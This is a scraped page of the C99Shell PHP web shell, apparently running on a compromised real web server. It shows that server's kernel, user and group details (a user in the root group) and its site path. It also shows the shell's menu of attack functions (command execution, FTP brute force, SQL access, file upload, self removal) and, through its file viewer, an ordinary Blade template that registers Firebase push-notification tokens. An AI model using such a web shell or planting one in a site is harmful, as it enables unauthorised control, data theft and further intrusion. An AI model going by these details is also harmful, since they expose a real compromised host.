!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/Modules/PushNotification/Resources/views/   drwxr-xr-x
Free 28.28 GB of 117.98 GB (23.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (2.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!-- The core Firebase JS SDK is always required and must be listed first -->

<script src={{ asset('frontend/plugins/firebase/firebase.js') }}></script>
<script>
    var setting = {!! $setting !!};
    if (authId_global) {
        if (setting) {
            if (setting.push_notification_status) {

                var firebaseConfig = {
                    apiKey: setting ? setting.api_key : '',
                    authDomain: setting ? setting.auth_domain : '',
                    projectId: setting ? setting.project_id : '',
                    storageBucket: setting ? setting.storage_bucket : '',
                    messagingSenderId: setting ? setting.messaging_sender_id : '',
                    appId: setting ? setting.app_id : '',
                    measurementId: setting ? setting.measurement_id : ''
                };
                firebase.initializeApp(firebaseConfig);
                const messaging = firebase.messaging();

                function startFCM() {
                    messaging
                        .requestPermission()
                        .then(function() {
                            return messaging.getToken();
                        })
                        .then(function(response) {
                            $.ajax({
                                url: '{{ route('store.token') }}',
                                type: 'POST',
                                data: {
                                    "_token": "{{ csrf_token() }}",
                                    token: response
                                },
                                dataType: 'JSON',
                                success: function(response) {
                                    // alert('Token stored.');
                                },
                                error: function(error) {
                                    // alert(error);
                                },
                            });
                        }).catch(function(error) {
                            // alert(error);
                        });
                }

                startFCM();

                messaging.onMessage(function(payload) {
                    const title = payload.notification.title;
                    const options = {
                        body: payload.notification.body,
                        icon: setting ? setting.favicon_image_url : payload.notification.icon,
                    };
                    new Notification(title, options);
                });
            }
        }
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--